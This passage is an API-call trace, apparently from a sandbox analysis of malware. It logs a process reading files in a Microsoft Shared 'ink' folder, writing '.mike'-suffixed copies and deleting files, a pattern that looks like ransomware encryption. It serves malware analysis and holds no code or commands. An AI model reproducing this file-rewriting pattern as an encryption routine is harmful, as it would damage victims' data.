Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.517] GetFileType (hFile=0x264) returned 0x1 [0043.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.517] GetFileType (hFile=0x264) returned 0x1 [0043.518] WriteFile (in: hFile=0x264, lpBuffer=0x21101bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21101bc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.518] CloseHandle (hObject=0x264) returned 1 [0043.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41fb820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe41fb820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4247ae0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x211186c | out: lpFileInformation=0x211186c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41fb820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe41fb820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4247ae0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.520] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", dwFileAttributes=0x80) returned 0 [0043.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.521] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41fb820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe41fb820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4247ae0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml", lpFilePart=0x0) returned 0x3d [0043.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike", lpFilePart=0x0) returned 0x42 [0043.521] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscat.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.mike")) returned 1 [0043.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.524] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.524] GetFileType (hFile=0x264) returned 0x1 [0043.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.524] GetFileType (hFile=0x264) returned 0x1 [0043.524] CloseHandle (hObject=0x264) returned 1 [0043.524] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.525] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.525] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), fInfoLevelId=0x0, lpFileInformation=0x21137cc | out: lpFileInformation=0x21137cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e)) returned 1 [0043.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), fInfoLevelId=0x0, lpFileInformation=0x2113abc | out: lpFileInformation=0x2113abc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e)) returned 1 [0043.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.525] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.525] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.526] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.526] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.527] GetFileType (hFile=0x264) returned 0x1 [0043.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.527] GetFileType (hFile=0x264) returned 0x1 [0043.527] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.527] WriteFile (in: hFile=0x264, lpBuffer=0x2114810*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2114810*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.528] CloseHandle (hObject=0x264) returned 1 [0043.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.528] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), fInfoLevelId=0x0, lpFileInformation=0x2114354 | out: lpFileInformation=0x2114354*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27bfdab7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27bfdab7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99e)) returned 1 [0043.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.528] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.528] GetFileType (hFile=0x264) returned 0x1 [0043.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.528] GetFileType (hFile=0x264) returned 0x1 [0043.528] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.529] ReadFile (in: hFile=0x264, lpBuffer=0x2115924, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2115924*, lpNumberOfBytesRead=0x2af0c8*=0x99e, lpOverlapped=0x0) returned 1 [0043.530] CloseHandle (hObject=0x264) returned 1 [0043.530] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.531] GetFileType (hFile=0x264) returned 0x1 [0043.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.531] GetFileType (hFile=0x264) returned 0x1 [0043.531] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.531] WriteFile (in: hFile=0x264, lpBuffer=0x211c160*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x211c160*, lpNumberOfBytesWritten=0x2af0bc*=0x9a0, lpOverlapped=0x0) returned 1 [0043.531] CloseHandle (hObject=0x264) returned 1 [0043.532] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.532] GetFileType (hFile=0x264) returned 0x1 [0043.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.532] GetFileType (hFile=0x264) returned 0x1 [0043.533] WriteFile (in: hFile=0x264, lpBuffer=0x211f374*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x211f374*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.533] CloseHandle (hObject=0x264) returned 1 [0043.534] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.534] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.534] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe426dc40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbc0)) returned 1 [0043.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.534] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.534] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.534] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2120a24 | out: lpFileInformation=0x2120a24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe426dc40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbc0)) returned 1 [0043.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.534] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", dwFileAttributes=0x80) returned 0 [0043.536] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.536] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.536] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe426dc40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbc0)) returned 1 [0043.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.536] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml", lpFilePart=0x0) returned 0x3d [0043.536] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", 